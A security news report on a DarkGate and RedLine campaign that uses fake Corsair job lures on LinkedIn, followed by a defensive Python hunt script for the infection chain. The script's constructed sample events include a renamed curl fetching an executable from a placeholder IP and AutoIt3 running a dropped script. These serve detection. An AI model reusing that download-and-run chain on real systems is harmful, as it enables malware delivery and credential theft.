
A threat actor is using fake LinkedIn posts and direct messages about a Facebook Ads specialist position at hardware maker Corsair to lure people into downloading info-stealing malware such as DarkGate and RedLine.
Cybersecurity company WithSecure detected the activity and tracked the group behind it, showing in a report published today that it is linked to the Vietnamese cybercriminal groups responsible for the 'Ducktail' campaigns first observed last year.
These campaigns aim to steal valuable Facebook business accounts that can be used for malvertising or sold to other cybercriminals.
DarkGate was first observed in 2017, but its deployment remained limited until June 2023, when its author decided to sell access to the malware to a larger audience.
Recent examples of DarkGate's use include phishing attacks through Microsoft Teams that push the payload, and the use of compromised Skype accounts to send VBS scripts that trigger an infection chain leading to the malware.
Corsair lure
The Vietnamese threat actors mainly targeted users in the U.S., the U.K., and India who hold social media management positions and are likely to have access to Facebook business accounts. The lure is delivered over LinkedIn and involves a job offer at Corsair.
Targets are tricked into downloading malicious files from a URL ("g2[.]by/corsair-JD") that redirects to Google Drive or Dropbox to drop a ZIP file ("Salary and new products.8.4.zip") containing a PDF or DOCX document and a TXT file with the following names:
- Job Description of Corsair.docx
- Salary and new products.txt
- PDF Salary and Products.pdf
WithSecure researchers analyzed the metadata of the above files and found leads to RedLine stealer distribution.
The downloaded archive contains a VBS script, possibly embedded in the DOCX file, that copies 'curl.exe' to a new location under a different name and uses it to download 'autoit3.exe' and a compiled AutoIt3 script.
The executable launches the script, which de-obfuscates itself and constructs DarkGate from strings present in the script.
Thirty seconds after installation, the malware attempts to uninstall security products from the compromised system, indicating the existence of an automated process.
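The delivery chain above leaves a recognisable trail in process-creation telemetry, and the following Python hunt is an added example (not WithSecure's detection content or the article's own code) that checks for it over Sysmon Event ID 1-style records: a renamed curl.exe is still identifiable because Sysmon's OriginalFileName comes from the PE version resource and does not change when the file is copied under a new name, a script host (the VBS stage) spawning curl or AutoIt3, AutoIt3 executing a script from a user-writable path, and the lure file names reported above appearing on a command line. The sample events, user name, paths and the 203.0.113.5 address are constructed; the field names follow Sysmon and will need mapping to your SIEM's schema.

```python
"""Hunt for the Corsair-lure DarkGate delivery chain in Sysmon-style process events (added example)."""
import os
import re

# Lure and archive names reported in the WithSecure findings summarised above (lower-cased for matching).
ARCHIVE_IOCS = {
    "salary and new products.8.4.zip",
    "job description of corsair.docx",
    "salary and new products.txt",
    "pdf salary and products.pdf",
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Directories an unprivileged user can write to; a tuned rule would add per-environment paths.
USER_WRITABLE = re.compile(r"^(?:c:\\users\\|c:\\programdata\\|c:\\windows\\temp\\)", re.I)
OUTPUT_FLAG = re.compile(r'(?:-o|--output)\s+"?([^"\s]+)', re.I)


def _base(path):
    """Basename of a Windows path, usable on any OS."""
    return os.path.basename(path.replace("\\", "/")).lower()


def _argv(cmd):
    """Tokenise a command line, keeping quoted paths with spaces together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def check_event(ev):
    """Return the names of the rules one process-creation event trips (empty list if none)."""
    hits = []
    image = _base(ev.get("Image", ""))
    orig = ev.get("OriginalFileName", "").lower()
    parent = _base(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")

    # 1. curl.exe copied under another name: the version resource still reads curl.exe.
    if orig == "curl.exe" and image != "curl.exe":
        hits.append("renamed_curl")

    # 2. curl (renamed or not) writing an executable or AutoIt payload to a user-writable path.
    m = OUTPUT_FLAG.search(cmd)
    if orig == "curl.exe" and m and USER_WRITABLE.match(m.group(1)) \
            and m.group(1).lower().endswith((".exe", ".a3x", ".au3")):
        hits.append("curl_drops_payload")

    # 3. A script host (the VBS stage) spawning the downloader or the AutoIt interpreter.
    if parent in SCRIPT_HOSTS and orig in ("curl.exe", "autoit3.exe"):
        hits.append("vbs_spawns_downloader")

    # 4. AutoIt3 running a script that lives in a user-writable location.
    if orig == "autoit3.exe" and any(USER_WRITABLE.match(a) for a in _argv(cmd)[1:]):
        hits.append("autoit_script_from_user_path")

    # 5. Reported lure or archive file names on any command line (e.g. the ZIP being opened).
    if any(ioc in cmd.lower() for ioc in ARCHIVE_IOCS):
        hits.append("corsair_lure_filename")
    return hits


def hunt(events):
    """Run every rule over a batch of events; return (index, hits) for each event that trips one."""
    results = []
    for i, ev in enumerate(events):
        hits = check_event(ev)
        if hits:
            results.append((i, hits))
    return results


# Constructed sample telemetry (not real logs): one benign curl, the renamed-curl download,
# AutoIt3 launched by wscript, a legitimate AutoIt developer run, and the lure ZIP being opened.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe -s https://example.org/status"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\upd.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"upd.exe -o C:\Users\alice\AppData\Local\Temp\autoit3.exe http://203.0.113.5/a.exe"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\autoit3.exe", "OriginalFileName": "AutoIt3.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"autoit3.exe C:\Users\alice\AppData\Local\Temp\script.a3x"},
    {"Image": r"C:\Program Files\AutoIt3\AutoIt3.exe", "OriginalFileName": "AutoIt3.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\AutoIt3\AutoIt3.exe" C:\Program Files\Tools\build.au3'},
    {"Image": r"C:\Windows\explorer.exe", "OriginalFileName": "EXPLORER.EXE",
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": r'explorer.exe "C:\Users\alice\Downloads\Salary and new products.8.4.zip"'},
]

if __name__ == "__main__":
    for idx, rules in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(rules)}")
```

Rules 1 and 3 are the high-signal ones: a process whose OriginalFileName is curl.exe but whose image name is not, or a script host launching curl or AutoIt3, is rare in normal fleets. Rule 4 will fire on developers who keep AutoIt scripts under their profile, so scope it to hosts where AutoIt is not expected. Because OriginalFileName is read from the version resource, an attacker who strips or edits that resource defeats rule 1; pair it with a hash or signer check where your telemetry carries one.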
LinkedIn introduced features late last year to fight abuse on the platform that can help users determine whether an account is suspicious or fake. However, it still falls on users to check the verified information before engaging with a new account.
WithSecure has released a list of indicators of compromise (IoCs) that can help organizations defend against activity from this threat actor. The details include IP addresses, domains, URLs, file metadata, and archive names.